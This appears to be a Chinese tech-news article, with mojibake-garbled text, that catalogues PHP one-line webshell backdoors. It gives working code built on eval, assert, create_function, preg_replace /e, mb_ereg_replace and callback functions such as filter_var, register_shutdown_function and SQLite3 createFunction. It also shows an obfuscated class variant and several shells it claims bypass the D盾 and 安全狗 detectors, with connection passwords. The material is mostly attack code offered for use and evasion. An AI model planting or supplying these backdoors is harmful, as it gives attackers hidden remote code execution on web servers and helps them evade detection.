php任意代碼執(zhí)行的一句話后門有哪些

php任意代碼執(zhí)行的一句話后門有哪些，相信很多沒有經(jīng)驗的人對此束手無策，為此本文總結(jié)了問題出現(xiàn)的原因和解決方法，通過這篇文章希望你能解決這個問題。

開發(fā)很久的可利用函數(shù)

eval和assert

php任意代碼執(zhí)行的一句話后門，我們喜歡用的是傳統(tǒng)的eval，php5，7通用。

<?php @eval($_POST['a']) ?>

但由于eval不能拆分，早期也有人喜歡用assert，這樣通過編碼和拆分assert，隱蔽性更高

<?php @assert($_POST['a']) ?>

雖然有人說assert在php7.0及其以上版本被禁用，但實際上并沒有禁用，而是和eval一樣禁止拆分了。

絕大部分一句話后門，都跟這兩個函數(shù)（其實不是函數(shù)）有關(guān)

create_function和preg_replace函數(shù)

create_function，它的作用是創(chuàng)建一個匿名函數(shù)，在內(nèi)部也相當于執(zhí)行了一次eval。php5，7都可用

<?php $st=@create_function('',$_POST['a']);$st();?>

/e修飾符，也就是大家熟知的preg_replace。這個則是真的php7用不了了，僅限php5。

<?php @preg_replace('/.*/e',$_POST['a'],'');?>

除了preg_replace之外，還有一個和它類似的函數(shù)。

<?php @preg_filter('/.*/e',$_POST['a'],'');?>

這兩個都是僅限php5的，php7也想用這種方法怎么辦呢？有辦法，php并沒有完全將/e修飾符趕盡殺絕。

<?php @mb_ereg_replace('.*',$_POST['a'],'','ee');?>
<?php @mb_eregi_replace('.*',$_POST['a'],'','ee');?>

它們甚至還有別名

<?php @mbereg_replace('.*',$_POST['a'],'','ee');?>
<?php @mberegi_replace('.*',$_POST['a'],'','ee');?>

繞D盾方法

上面這些都開發(fā)出來很久了，單純拿這些去繞D盾是很難的，這里也不是來教大家繞D盾的。想繞的話，其實D盾對類的檢測力度不高，自己寫個混淆一點的類，php5用assert拆分，php7用create_function拆分其實就很容易繞過去。舉個例子

//該例子為create_function拆分，php5.3.29和5.2.17測試完不可行，php5.4.45-php7都可行。故php5用assert拆分，php7用create_function拆分這樣最穩(wěn)
<?php
class create{
public $filter = ['q'=>'_function'];
public $value = '';
public function __construct(){
$this->value = $_POST['a'];
$name=get_class($this).$this->filter['q'];
$st=$name('',$this->value);
$st();
}
}
$a = new create();

免殺一句話木馬之回調(diào)函數(shù)

回調(diào)函數(shù)的本質(zhì)是下面這種代碼，以函數(shù)作為變量。

<?php $_GET['a']($_GET['b']);?>

比較老的回調(diào)后門

URL地址：http://127.0.0.1/1.php 連接密碼：pass

php中call_user_func是執(zhí)行回調(diào)函數(shù)的標準方法，這是比較老的后門了：

<?php
call_user_func('assert', $_REQUEST['pass']);

<?php
call_user_func_array('assert', array($_REQUEST['pass']));

真免殺回調(diào)后門(過安全狗,D盾)

URL地址：http://127.0.0.1/1.php?e=assert 連接密碼：pass

<?php
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));

<?php
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);

<?php
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');

下面這兩個回調(diào)后門，都是依靠php擴展庫（pdo和sqlite3）來實現(xiàn)的：

<?php
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));

上面這種sqlite方法是依靠PDO執(zhí)行的。我們也可以直接調(diào)用sqlite3的方法構(gòu)造回調(diào)后門，前提是php5.3以上。

<?php
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();

看完上述內(nèi)容，你們掌握php任意代碼執(zhí)行的一句話后門有哪些的方法了嗎？如果還想學到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注億速云行業(yè)資訊頻道，感謝各位的閱讀！